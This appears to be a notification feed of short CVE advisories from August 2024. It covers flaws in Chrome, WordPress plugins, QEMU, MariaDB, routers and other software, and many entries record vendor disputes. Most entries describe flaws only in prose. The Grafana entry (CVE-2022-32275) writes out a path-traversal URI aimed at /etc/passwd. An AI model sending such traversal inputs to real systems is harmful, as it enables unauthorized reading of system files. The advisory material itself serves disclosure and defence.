🚨 CVE-2024-6990Uninitialized Use in Dawn in Google Chrome on Android prior to 127.0.6533.88 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2024-08-03 18:37:26 |
🚨 CVE-2021-4312** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in Th3-822 Rapidleech. This affects the function zip_go of the file classes/options/zip.php. The manipulation of the argument archive leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named 885a87ea4ee5e14fa95801eca255604fb2e138c6. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218295. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-03 18:37:25 |
🚨 CVE-2021-4258A vulnerability was found in whohas. It has been rated as problematic. This issue affects some unknown processing of the component Package Information Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be initiated remotely. The real existence of this vulnerability is still doubted at the moment. The name of the patch is 667c3e2e9178f15c23d7918b5db25cd0792c8472. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216251. NOTE: Most sources redirect to the encrypted site which limits the possibilities of an attack.🎖@cveNotify |
|
| 2024-08-03 18:37:24 |
🚨 CVE-2021-20028Improper neutralization of a SQL Command leading to SQL Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products, specifically the SRA appliances running all 8.x firmware and 9.0.0.9-26sv or earlier🎖@cveNotify |
|
| 2024-08-03 17:37:35 |
🚨 CVE-2024-7440** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Vivotek CC8160 VVTK-0100d. It has been classified as critical. This affects the function getenv of the file upload_file.cgi. The manipulation of the argument QUERY_STRING leads to command injection. It is possible to initiate the attack remotely. The identifier VDB-273525 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-08-03 17:37:31 |
🚨 CVE-2021-3163A vulnerability in the HTML editor of Slab Quill 4.8.0 allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted onloadstart attribute of an IMG element) in a text field. Note: Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser🎖@cveNotify |
|
| 2024-08-03 17:37:30 |
🚨 CVE-2021-3152Home Assistant before 2021.1.3 does not have a protection layer that can help to prevent directory-traversal attacks against custom integrations. NOTE: the vendor's perspective is that the vulnerability itself is in custom integrations written by third parties, not in Home Assistant; however, Home Assistant does have a security update that is worthwhile in addressing this situation🎖@cveNotify |
|
| 2024-08-03 17:37:26 |
🚨 CVE-2021-3178fs/nfsd/nfs3xdr.c in the Linux kernel through 5.10.8, when there is an NFS export of a subdirectory of a filesystem, allows remote attackers to traverse to other parts of the filesystem via READDIRPLUS. NOTE: some parties argue that such a subdirectory export is not intended to prevent this attack; see also the exports(5) no_subtree_check default behavior🎖@cveNotify |
|
| 2024-08-03 17:37:25 |
🚨 CVE-2021-3029EVOLUCARE ECSIMAGING (aka ECS Imaging) through 6.21.5 has an OS Command Injection vulnerability via shell metacharacters and an IFS manipulation. The parameter "file" on the webpage /showfile.php can be exploited to gain root access. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 17:37:24 |
🚨 CVE-2021-3007Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized🎖@cveNotify |
|
| 2024-08-03 16:37:26 |
🚨 CVE-2024-7439** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Vivotek CC8160 VVTK-0100d and classified as critical. Affected by this issue is the function read of the component httpd. The manipulation of the argument Content-Length leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273524. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-08-03 16:37:25 |
🚨 CVE-2024-37286APM server logs contain document body from a partially failed bulk index request. For example, in case of unavailable_shards_exception for a specific document, since the ES response line contains the document body, and that APM server logs the ES response line on error, the document is effectively logged.🎖@cveNotify |
|
| 2024-08-03 16:37:24 |
🚨 CVE-2022-48775In the Linux kernel, the following vulnerability has been resolved:Drivers: hv: vmbus: Fix memory leak in vmbus_add_channel_kobjkobject_init_and_add() takes reference even when it fails.According to the doc of kobject_init_and_add(): If this function returns an error, kobject_put() must be called to properly clean up the memory associated with the object.Fix memory leak by calling kobject_put().🎖@cveNotify |
|
| 2024-08-03 15:37:44 |
🚨 CVE-2022-47555Operating system command injection in ekorCCP and ekorRCI, which could allow an authenticated attacker to execute commands, create new users with elevated privileges or set up a backdoor.🎖@cveNotify |
|
| 2024-08-03 15:37:43 |
🚨 CVE-2022-47553Incorrect authorisation in ekorCCP and ekorRCI, which could allow a remote attacker to obtain resources with sensitive information for the organisation, without being authenticated within the web server.🎖@cveNotify |
|
| 2024-08-03 15:37:42 |
🚨 CVE-2022-45597ComponentSpace.Saml2 4.4.0 Missing SSL Certificate Validation. NOTE: the vendor does not consider this a vulnerability because the report is only about use of certificates at the application layer (not the transport layer) and "Certificates are exchanged in a controlled fashion between entities within a trust relationship. This is why self-signed certificates may be used and why validating certificates isn’t as important as doing so for the transport layer certificates."🎖@cveNotify |
|
| 2024-08-03 15:37:39 |
🚨 CVE-2022-48110CKSource CKEditor 5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Full Featured CKEditor5 widget. NOTE: the vendor's position is that this is not a vulnerability. The CKEditor 5 documentation discusses that it is the responsibility of an integrator (who is adding CKEditor 5 functionality to a website) to choose the correct security settings for their use case. Also, safe default values are established (e.g., config.htmlEmbed.showPreviews is false).🎖@cveNotify |
|
| 2024-08-03 15:37:38 |
🚨 CVE-2022-45544Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role.🎖@cveNotify |
|
| 2024-08-03 15:37:37 |
🚨 CVE-2022-45639OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value to the m parameter. NOTE: third parties have disputed this because there is no analysis showing that the backtick command executes outside the context of the user account that entered the command line.🎖@cveNotify |
|
| 2024-08-03 15:37:36 |
🚨 CVE-2022-47065TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the submit-url parameter at /formNewSchedule. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-03 15:37:33 |
🚨 CVE-2022-46463An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature."🎖@cveNotify |
|
| 2024-08-03 15:37:32 |
🚨 CVE-2022-48217The tf_remapper_node component 1.1.1 for Robot Operating System (ROS) allows attackers, who control the source code of a different node in the same ROS application, to change a robot's behavior. This occurs because a topic name depends on the attacker-controlled old_tf_topic_name and/or new_tf_topic_name parameter. NOTE: the vendor's position is "it is the responsibility of the programmer to make sure that only known and required parameters are set and unexpected parameters are not."🎖@cveNotify |
|
| 2024-08-03 15:37:31 |
🚨 CVE-2022-48197Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-03 15:37:27 |
🚨 CVE-2022-47578An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by booting into Safe Mode. This allows a file to be exchanged outside the laptop/system. Safe Mode can be launched by any user (even without admin rights). Data exfiltration can occur, and also malware might be introduced onto the system. NOTE: the vendor's position is "it's not a vulnerability in our product."🎖@cveNotify |
|
| 2024-08-03 15:37:26 |
🚨 CVE-2022-46366Apache Tapestry 3.x allows deserialization of untrusted data, leading to remote code execution. This issue is similar to but distinct from CVE-2020-17531, which applies the the (also unsupported) 4.x version line. NOTE: This vulnerability only affects Apache Tapestry version line 3.x, which is no longer supported by the maintainer. Users are recommended to upgrade to a supported version line of Apache Tapestry.🎖@cveNotify |
|
| 2024-08-03 15:37:25 |
🚨 CVE-2022-45470missing input validation in Apache Hama may cause information disclosure through path traversal and XSS. Since Apache Hama is EOL, we do not expect these issues to be fixed.🎖@cveNotify |
|
| 2024-08-03 14:37:36 |
🚨 CVE-2024-7436A vulnerability, which was classified as critical, has been found in D-Link DI-8100 16.07. This issue affects the function msp_info_htm of the file msp_info.htm. The manipulation of the argument cmd leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273521 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-03 14:37:32 |
🚨 CVE-2022-44036In b2evolution 7.2.5, if configured with admins_can_manipulate_sensitive_files, arbitrary file upload is allowed for admins, leading to command execution. NOTE: the vendor's position is that this is "very obviously a feature not an issue and if you don't like that feature it is very obvious how to disable it."🎖@cveNotify |
|
| 2024-08-03 14:37:31 |
🚨 CVE-2022-44117Boa 0.94.14rc21 is vulnerable to SQL Injection via username. NOTE: the is disputed by multiple third parties because Boa does not ship with any support for SQL.🎖@cveNotify |
|
| 2024-08-03 14:37:30 |
🚨 CVE-2022-45136Apache Jena SDB 3.17.0 and earlier is vulnerable to a JDBC Deserialisation attack if the attacker is able to control the JDBC URL used or cause the underlying database server to return malicious data. The mySQL JDBC driver in particular is known to be vulnerable to this class of attack. As a result an application using Apache Jena SDB can be subject to RCE when connected to a malicious database server. Apache Jena SDB has been EOL since December 2020 and users should migrate to alternative options e.g. Apache Jena TDB 2.🎖@cveNotify |
|
| 2024-08-03 14:37:26 |
🚨 CVE-2022-43752Oracle Solaris version 10 1/13, when using the Common Desktop Environment (CDE), is vulnerable to a privilege escalation vulnerability. A low privileged user can escalate to root by crafting a malicious printer and double clicking on the the crafted printer's icon.🎖@cveNotify |
|
| 2024-08-03 14:37:25 |
🚨 CVE-2022-43284Nginx NJS v0.7.2 to v0.7.4 was discovered to contain a segmentation violation via njs_scope_valid_value at njs_scope.h. NOTE: the vendor disputes the significance of this report because NJS does not operate on untrusted input.🎖@cveNotify |
|
| 2024-08-03 14:37:24 |
🚨 CVE-2022-42969The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. Note: This has been disputed by multiple third parties as not being reproduceable and they argue this is not a valid vulnerability.🎖@cveNotify |
|
| 2024-08-03 13:37:26 |
🚨 CVE-2022-40929XXL-JOB 2.2.0 has a Command execution vulnerability in background tasks. NOTE: this is disputed because the issues/4929 report is about an intended and supported use case (running arbitrary Bash scripts on behalf of users).🎖@cveNotify |
|
| 2024-08-03 13:37:25 |
🚨 CVE-2022-41220md2roff 1.9 has a stack-based buffer overflow via a Markdown file, a different vulnerability than CVE-2022-34913. NOTE: the vendor's position is that the product is not intended for untrusted input🎖@cveNotify |
|
| 2024-08-03 13:37:24 |
🚨 CVE-2022-40297UBports Ubuntu Touch 16.04 allows the screen-unlock passcode to be used for a privileged shell via Sudo. This passcode is only four digits, far below typical length/complexity for a user account's password. NOTE: a third party states "The described attack cannot be executed as demonstrated.🎖@cveNotify |
|
| 2024-08-03 12:37:30 |
🚨 CVE-2024-6872The Build Your Dream Website Fast with 400+ Starter Templates and Landing Pages, No Coding Needed, One-Click Import for Elementor & Gutenberg Blocks! – TemplateSpare plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'templatespare_activate_required_theme' and 'templatespare_get_theme_status' functions in all versions up to, and including, 2.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate any installed theme and read any theme status. If the attacker attempts to activate a theme that is not installed, a non-existent theme with the slug chosen by the attacker will be considered the active theme, leaving the site with no theme functionality.🎖@cveNotify |
|
| 2024-08-03 12:37:27 |
🚨 CVE-2024-6709The Sync Post With Other Site plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'sps_add_update_post' function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new draft posts and update existing posts.🎖@cveNotify |
|
| 2024-08-03 12:37:26 |
🚨 CVE-2024-38329IBM Storage Protect for Virtual Environments: Data Protection for VMware 8.1.0.0 through 8.1.22.0 could allow a remote authenticated attacker to bypass security restrictions, caused by improper validation of user permission. By sending a specially crafted request, an attacker could exploit this vulnerability to change its settings, trigger backups, restore backups, and also delete all previous backups via log rotation. IBM X-Force ID: 294994.🎖@cveNotify |
|
| 2024-08-03 12:37:25 |
🚨 CVE-2022-39842An issue was discovered in the Linux kernel before 5.19. In pxa3xx_gcu_write in drivers/video/fbdev/pxa3xx-gcu.c, the count parameter has a type conflict of size_t versus int, causing an integer overflow and bypassing the size check. After that, because it is used as the third argument to copy_from_user(), a heap overflow may occur. NOTE: the original discoverer disputes that the overflow can actually happen.🎖@cveNotify |
|
| 2024-08-03 12:37:24 |
🚨 CVE-2022-39196Blackboard Learn 1.10.1 allows remote authenticated users to read unintended files by entering student credentials and then directly visiting a certain webapps/bbcms/execute/ URL. Note: The vendor disputes this stating this cannot be reproduced.🎖@cveNotify |
|
| 2024-08-03 11:37:31 |
🚨 CVE-2022-38651A security filter misconfiguration exists in VMware Hyperic Server 5.8.6. Exploitation of this vulnerability enables a malicious party to bypass some authentication requirements when issuing requests to Hyperic Server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-03 11:37:30 |
🚨 CVE-2022-38168Broken Access Control in User Authentication in Avaya Scopia Pathfinder 10 and 20 PTS version 8.3.7.0.4 allows remote unauthenticated attackers to bypass the login page, access sensitive information, and reset user passwords via URL modification.🎖@cveNotify |
|
| 2024-08-03 11:37:29 |
🚨 CVE-2022-37598Prototype pollution vulnerability in function DEFNODE in ast.js in mishoo UglifyJS 3.13.2 via the name variable in ast.js. NOTE: the vendor considers this an invalid report.🎖@cveNotify |
|
| 2024-08-03 11:37:26 |
🚨 CVE-2022-37767Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok. NOTE: the vendor disputes this because input to the Pebble templating engine is intended to include arbitrary Java code, and thus either the input should not arrive from an untrusted source, or else the application using the engine should apply restrictions to the input. The engine is not responsible for validating the input.🎖@cveNotify |
|
| 2024-08-03 11:37:25 |
🚨 CVE-2022-37177HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm. NOTE: this is disputed by the vendor for multiple reasons, e.g., it is inconsistent with CVE ID assignment rules for cloud services, and no product with version V1.0 exists. Furthermore, the rail-fence cipher has been removed, and TLS 1.2 is now used for encryption.🎖@cveNotify |
|
| 2024-08-03 11:37:24 |
🚨 CVE-2022-37431A Reflected Cross-site scripting (XSS) issue was discovered in dotCMS Core through 22.06. This occurs in the admin portal when the configuration has XSS_PROTECTION_ENABLED=false. NOTE: the vendor disputes this because the current product behavior, in effect, has XSS_PROTECTION_ENABLED=true in all configurations🎖@cveNotify |
|
| 2024-08-03 10:37:30 |
🚨 CVE-2024-7257The YayExtra – WooCommerce Extra Product Options plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_upload_file function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-08-03 10:37:29 |
🚨 CVE-2022-36648The hardware emulation in the of_dpa_cmd_add_l2_flood of rocker device model in QEMU, as used in 7.0.0 and earlier, allows remote attackers to crash the host qemu and potentially execute code on the host via execute a malformed program in the guest OS. Note: This has been disputed by multiple third parties as not a valid vulnerability due to the rocker device not falling within the virtualization use case.🎖@cveNotify |
|
| 2024-08-03 10:37:26 |
🚨 CVE-2022-35911On Patlite NH-FB series devices through 1.46, remote attackers can cause a denial of service by omitting the query string. NOTE: the vendor's perspective is that "omitting the query string does not cause a denial of service and the indicated event can not be reproduced.🎖@cveNotify |
|
| 2024-08-03 10:37:25 |
🚨 CVE-2022-35414softmmu/physmem.c in QEMU through 7.0.0 can perform an uninitialized read on the translate_fail path, leading to an io_readx or io_writex crash. NOTE: a third party states that the Non-virtualization Use Case in the qemu.org reference applies here, i.e., "Bugs affecting the non-virtualization use case are not considered security bugs at this time.🎖@cveNotify |
|
| 2024-08-03 10:37:24 |
🚨 CVE-2022-34913md2roff 1.7 has a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. NOTE: the vendor's position is that the product is not intended for untrusted input🎖@cveNotify |
|
| 2024-08-03 09:37:25 |
🚨 CVE-2022-34038Etcd v3.5.4 allows remote attackers to cause a denial of service via function PageWriter.write in pagewriter.go. NOTE: the vendor's position is that this is not a vulnerability.🎖@cveNotify |
|
| 2024-08-03 09:37:24 |
🚨 CVE-2022-34037An out-of-bounds read in the rewrite function at /modules/caddyhttp/rewrite/rewrite.go in Caddy v2.5.1 allows attackers to cause a Denial of Service (DoS) via a crafted URI. Note: This has been disputed as a bug, not a security vulnerability, in the Caddy web server that emerged when an administrator's bad configuration containing a malformed request URI caused the server to return an empty reply instead of a valid HTTP response to the client.🎖@cveNotify |
|
| 2024-08-03 08:37:41 |
🚨 CVE-2022-32277Squiz Matrix CMS 6.20 is vulnerable to an Insecure Direct Object Reference caused by failure to correctly validate authorization when submitting a request to change a user's contact details. NOTE: this is disputed by both the vendor and the original discoverer because it is a site-specific finding, not a finding about the Squiz Matrix CMS product.🎖@cveNotify |
|
| 2024-08-03 08:37:37 |
🚨 CVE-2022-32317The MPlayer Project v1.5 was discovered to contain a heap use-after-free resulting in a double free in the preinit function at libvo/vo_v4l2.c. This vulnerability can lead to a Denial of Service (DoS) via a crafted file. The device=strdup statement is not executed on every call. Note: This has been disputed by third parties as invalid and not reproduceable.🎖@cveNotify |
|
| 2024-08-03 08:37:36 |
🚨 CVE-2022-32294Zimbra Collaboration Open Source 8.8.15 does not encrypt the initial-login randomly created password (from the "zmprove ca" command). It is visible in cleartext on port UDP 514 (aka the syslog port). NOTE: a third party reports that this cannot be reproduced.🎖@cveNotify |
|
| 2024-08-03 08:37:35 |
🚨 CVE-2022-32533Apache Jetspeed-2 does not sufficiently filter untrusted user input by default leading to a number of issues including XSS, CSRF, XXE, and SSRF. Setting the configuration option "xss.filter.post = true" may mitigate these issues. NOTE: Apache Jetspeed is a dormant project of Apache Portals and no updates will be provided for this issue🎖@cveNotify |
|
| 2024-08-03 08:37:32 |
🚨 CVE-2022-33124AIOHTTP 3.8.1 can report a "ValueError: Invalid IPv6 URL" outcome, which can lead to a Denial of Service (DoS). NOTE: multiple third parties dispute this issue because there is no example of a context in which denial of service would occur, and many common contexts have exception handing in the calling application🎖@cveNotify |
|
| 2024-08-03 08:37:31 |
🚨 CVE-2022-31361Docebo Community Edition v4.0.5 and below was discovered to contain a SQL injection vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 08:37:30 |
🚨 CVE-2022-31734Cisco Catalyst 2940 Series Switches provided by Cisco Systems, Inc. contain a reflected cross-site scripting vulnerability regarding error page generation. An arbitrary script may be executed on the web browser of the user who is using the product. The affected firmware is prior to 12.2(50)SY released in 2011, and Cisco Catalyst 2940 Series Switches have been retired since January 2015🎖@cveNotify |
|
| 2024-08-03 08:37:26 |
🚨 CVE-2022-32275Grafana 8.4.3 allows reading files via (for example) a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd URI. NOTE: the vendor's position is that there is no vulnerability; this request yields a benign error page, not /etc/passwd content🎖@cveNotify |
|
| 2024-08-03 08:37:25 |
🚨 CVE-2022-31622MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (pthread_create returns a nonzero value) while executing the method create_worker_threads, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock. Note: The vendor argues this is just an improper locking bug and not a vulnerability with adverse effects.🎖@cveNotify |
|
| 2024-08-03 08:37:24 |
🚨 CVE-2022-31621MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_xbstream.cc, when an error occurs (stream_ctxt->dest_file == NULL) while executing the method xbstream_open, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock. Note: The vendor argues this is just an improper locking bug and not a vulnerability with adverse effects.🎖@cveNotify |
|
| 2024-08-03 07:37:37 |
🚨 CVE-2022-29550An issue was discovered in Qualys Cloud Agent 4.8.0-49. It writes "ps auxwwe" output to the /var/log/qualys/qualys-cloud-agent-scan.log file. This may, for example, unexpectedly write credentials (from environment variables) to disk in cleartext. NOTE: there are no common circumstances in which qualys-cloud-agent-scan.log can be read by a user other than root; however, the file contents could be exposed through site-specific operational practices. The vendor does NOT characterize this as a vulnerability because the ps data collection is intentional, and would only capture credentials on a machine that was already affected by the CWE-214 weakness🎖@cveNotify |
|
| 2024-08-03 07:37:36 |
🚨 CVE-2022-30591quic-go through 0.27.0 allows remote attackers to cause a denial of service (CPU consumption) via a Slowloris variant in which incomplete QUIC or HTTP/3 requests are sent. This occurs because mtu_discoverer.go misparses the MTU Discovery service and consequently overflows the probe timer. NOTE: the vendor's position is that this behavior should not be listed as a vulnerability on the CVE List🎖@cveNotify |
|
| 2024-08-03 07:37:32 |
🚨 CVE-2022-29778D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php🎖@cveNotify |
|
| 2024-08-03 07:37:31 |
🚨 CVE-2022-29622An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled. Strapi does not consider this to be a valid vulnerability.🎖@cveNotify |
|
| 2024-08-03 07:37:27 |
🚨 CVE-2022-29351An arbitrary file upload vulnerability in the file upload module of Tiddlywiki5 v5.2.2 allows attackers to execute arbitrary code via a crafted SVG file. Note: The vendor argues that this is not a legitimate issue and there is no vulnerability here.🎖@cveNotify |
|
| 2024-08-03 07:37:26 |
🚨 CVE-2022-30288Agoo before 2.14.3 does not reject GraphQL fragment spreads that form cycles, leading to an application crash. NOTE: the vendor has disputed this on the grounds that it is not the server's responsibility to "enforce all the various ways a developer could write code with logic errors.🎖@cveNotify |
|
| 2024-08-03 07:37:25 |
🚨 CVE-2022-29950Experian Hunter 1.16 allows remote authenticated users to modify assumed-immutable elements via the (1) rule name parameter to the Rules page or the (2) subrule name or (3) categories name parameter to the Subrules page. NOTE: the vendor disputes this because version 1.16 has never existed🎖@cveNotify |
|
| 2024-08-03 07:37:24 |
🚨 CVE-2022-29583service_windows.go in the kardianos service package for Go omits quoting that is sometimes needed for execution of a Windows service executable from the intended directory. NOTE: this finding could not be reproduced by its original reporter or by others.🎖@cveNotify |
|
| 2024-08-03 06:37:32 |
🚨 CVE-2024-6477The UsersWP WordPress plugin before 1.2.12 uses predictable filenames when an admin generates an export, which could allow unauthenticated attackers to download them and retrieve sensitive information such as IP, username, and email address🎖@cveNotify |
|
| 2024-08-03 06:37:31 |
🚨 CVE-2022-290727-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. NOTE: multiple third parties have reported that no privilege escalation can occur🎖@cveNotify |
|
| 2024-08-03 06:37:30 |
🚨 CVE-2022-28397An arbitrary file upload vulnerability in the file upload module of Ghost CMS v4.42.0 allows attackers to execute arbitrary code via a crafted file. NOTE: Vendor states as detailed in Ghost's security documentation, files can only be uploaded and published by trusted users, this is intentional🎖@cveNotify |
|
| 2024-08-03 06:37:26 |
🚨 CVE-2022-27139An arbitrary file upload vulnerability in the file upload module of Ghost v4.39.0 allows attackers to execute arbitrary code via a crafted SVG file. NOTE: Vendor states that as outlined in Ghost's security documentation, upload of SVGs is only possible by trusted authenticated users. The uploading of SVG files to Ghost does not represent a remote code execution vulnerability. SVGs are not executable on the server, and may only execute javascript in a client's browser - this is expected and intentional functionality🎖@cveNotify |
|
| 2024-08-03 06:37:25 |
🚨 CVE-2022-27772spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 06:37:24 |
🚨 CVE-2022-27948Certain Tesla vehicles through 2022-03-26 allow attackers to open the charging port via a 315 MHz RF signal containing a fixed sequence of approximately one hundred symbols. NOTE: the vendor's perspective is that the behavior is as intended🎖@cveNotify |
|
| 2024-08-03 05:37:35 |
🚨 CVE-2022-24700An issue was discovered in WinAPRS 2.9.0. A buffer overflow in DIGI address processing for VHF KISS packets allows a remote attacker to cause a denial of service (daemon crash) via a malicious AX.25 packet over the air. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 05:37:31 |
🚨 CVE-2022-24584Incorrect access control in Yubico OTP functionality of the YubiKey hardware tokens along with the Yubico OTP validation server. The Yubico OTP supposedly creates hardware bound second factor credentials. When a user reprograms the OTP functionality by "writing" it on a token using the Yubico Personalization Tool, they can then upload the new configuration to Yubicos OTP validation servers. NOTE: the vendor disputes this because there is no way for a YubiKey device to prevent a user from deciding that a secret value, which is imported into the device, should also be stored elsewhere🎖@cveNotify |
|
| 2024-08-03 05:37:30 |
🚨 CVE-2022-25517MyBatis plus v3.4.3 was discovered to contain a SQL injection vulnerability via the Column parameter in /core/conditions/AbstractWrapper.java. NOTE: the vendor's position is that the reported execution of a SQL statement was intended behavior.🎖@cveNotify |
|
| 2024-08-03 05:37:29 |
🚨 CVE-2022-25481ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php. NOTE: this is disputed by a third party because system environment exposure is an intended feature of the debugging mode.🎖@cveNotify |
|
| 2024-08-03 05:37:26 |
🚨 CVE-2022-25516stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.🎖@cveNotify |
|
| 2024-08-03 05:37:25 |
🚨 CVE-2022-26520In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties🎖@cveNotify |
|
| 2024-08-03 05:37:24 |
🚨 CVE-2022-24975The --mirror documentation for Git through 2.35.1 does not mention the availability of deleted content, aka the "GitBleed" issue. This could present a security risk if information-disclosure auditing processes rely on a clone operation without the --mirror option. Note: This has been disputed by multiple 3rd parties who believe this is an intended feature of the git binary and does not pose a security risk.🎖@cveNotify |
|
| 2024-08-03 04:37:25 |
🚨 CVE-2022-23835The Visual Voice Mail (VVM) application through 2022-02-24 for Android allows persistent access if an attacker temporarily controls an application that has the READ_SMS permission, and reads an IMAP credentialing message that is (by design) not displayed to the victim within the AOSP SMS/MMS messaging application. (Often, the IMAP credentials are usable to listen to voice mail messages sent before the vulnerability was exploited, in addition to new ones.) NOTE: some vendors characterize this as not a "concrete and exploitable risk.🎖@cveNotify |
|
| 2024-08-03 04:37:24 |
🚨 CVE-2022-24198iText v7.1.17 was discovered to contain an out-of-bounds exception via the component ARCFOUREncryption.encryptARCFOUR, which allows attackers to cause a Denial of Service (DoS) via a crafted PDF file. NOTE: Vendor does not view this as a vulnerability and has not found it to be exploitable.🎖@cveNotify |
|
| 2024-08-03 03:37:25 |
🚨 CVE-2022-22279A post-authentication arbitrary file read vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions🎖@cveNotify |
|
| 2024-08-03 03:37:24 |
🚨 CVE-2022-22273Improper neutralization of Special Elements leading to OS Command Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions🎖@cveNotify |
|
| 2024-08-03 02:37:32 |
